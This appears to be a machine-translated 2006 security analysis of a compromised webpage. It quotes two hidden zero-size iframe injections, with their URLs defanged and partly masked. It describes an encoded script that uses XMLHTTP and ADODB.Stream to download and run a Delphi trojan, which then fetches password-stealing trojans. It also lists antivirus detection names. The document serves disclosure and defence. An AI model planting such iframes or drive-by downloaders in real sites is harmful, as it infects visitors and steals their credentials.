EndurerOriginal
2006-10-25 th1Version
The webpage header is added to the code twice:
/---------
<IFRAME Height = 0 width = 0 src = "hxxp: // ip-I * E. www *** 113.cnidc.cn/wm?#/"> </iframe>
----------/
WM **. htm(Kaspersky reportsTrojan-Downloader.VBS.Psyme.cy) Is the escape ()-encrypted code, and the decrypted content is a Javascript script program. Before that, such script code was written in VBScript, however, Microsoft. XMLHTTP, ADODB. stream download1. exe, SaveC:/boot.exeRun the command using the ShellExecute method of Shell. Application.
1. exeDeveloped Using Borland Delphi, the file length is 15.5 KB (15,872 bytes), and Kaspersky reportsTrojan-Downloader.Win32.Small.dwuThe rising report isTrojan. DL. Agent. wzr.
1.exe downloads files from the same website:
1w.wow.exe (the report of rising isTrojan. psw. wowar. lr)
22.16qq.exe (jpg image icon is used, and Kaspersky reportsTrojan-PSW.Win32.QQRob.iwThe rising report isTrojan. psw. qqrobber. ajv)
Download an object from another website:
1100001234.exe (the value of Kaspersky isTrojan-PSW.Win32.WOW.leThe rising report isTrojan. psw. element. c)
22.164321.exe
There is code at the end of the page:
/---------
<IFRAME src = "hxxp: // bbs. geme *** us.com/m1%3/index%.htm" width = "0" Height = "0"> </iframe>
---------/
It may have expired.